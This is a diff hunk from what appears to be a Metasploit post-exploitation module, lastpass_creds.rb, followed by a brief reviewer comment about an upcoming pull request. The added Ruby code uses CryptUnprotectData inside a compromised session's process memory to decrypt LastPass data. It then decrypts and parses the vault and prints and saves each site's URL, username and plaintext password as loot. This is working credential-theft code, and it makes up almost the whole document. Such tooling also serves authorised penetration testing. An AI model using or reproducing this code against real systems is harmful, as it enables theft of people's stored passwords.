modules/post/multi/gather/lastpass_creds.rb

```diff
@@ -242,72 +210,585 @@ def file_paths(path, browser, account)
+    process.memory.write(mem, data)
+
+    if session.sys.process.each_process.find { |i| i["pid"] == pid } ["arch"] == "x86"
+      addr = [mem].pack("V")
+      len = [data.length].pack("V")
+      ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8)
+      len, addr = ret["pDataOut"].unpack("V2")
+    else
+      addr = Rex::Text.pack_int64le(mem)
+      len = Rex::Text.pack_int64le(data.length)
+      ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16)
+      pData = ret["pDataOut"].unpack("VVVV")
+      len = pData[0] + (pData[1] << 32)
+      addr = pData[2] + (pData[3] << 32)
+    end
+
+    return "" if len == 0
+    process.memory.read(addr, len)
+  end
+
+  def print_vault_passwords(account_map)
+    account_map.each_pair do |account, browser_map|
+      browser_map.each_pair do |browser, lp_data|
+        lp_data['lp_creds'].each_pair do |username, user_data|
+          lastpass_vault_data_table = Rex::Ui::Text::Table.new(
+            'Header' => "Decrypted vault from #{username}",
+            'Indent' => 1,
+            'Columns' => %w(URL Username Password)
+          )
+          if user_data['vault_loot'].nil? # Was a vault found?
+            print_error "No vault was found for #{username}"
+            next
+          end
+          encoded_vault = File.read(user_data['vault_loot'])
+          if encoded_vault[0] == "!" # Vault is double encrypted
+            encoded_vault = decrypt_data([user_data['vault_key']].pack("H*"), encoded_vault)
+            if encoded_vault.blank?
+              print_error "Vault from #{username} could not be decrypted"
+              next
+            else
+              encoded_vault = encoded_vault.sub("LPB64", "")
+            end
+          end
+
+          # Parse vault
+          vault = Base64.decode64(encoded_vault)
+          vault.scan(/ACCT/) do |result|
+            chunk_length = vault[$~.offset(0)[1]..$~.offset(0)[1] + 3].unpack("H*").first.to_i(16) # Get the length in base 10 of the ACCT chunk
+            chunk = vault[$~.offset(0)[0]..$~.offset(0)[1] + chunk_length] # Get ACCT chunk
+            account_data = parse_vault_account(chunk, user_data['vault_key'])
+            lastpass_vault_data_table << account_data if account_data != nil
+          end
+
+          unless account_map.empty? # Loot passwords
+            print_good lastpass_vault_data_table.to_s
+            loot_file(nil, lastpass_vault_data_table.to_csv, "#{browser.downcase}.lastpass.passwords", "text/csv", "LastPass Vault Passwords from #{username}")
+          end
+        end
+      end
+    end
+  end
+
+  def parse_vault_account(chunk, vault_key)
+    pointer = 22 # Starting position to find data to decrypt
+    labels = ["name", "folder", "url", "notes", "undefined", "undefined2", "username", "password"]
+    vault_data = []
+    for label in labels
+      length = chunk[pointer..pointer + 3].unpack("H*").first.to_i(16)
```

Comment:
Ok thanks, good to know. I'm currently making small changes (mostly cosmetic and error handling), and I will submit you a pull request soon.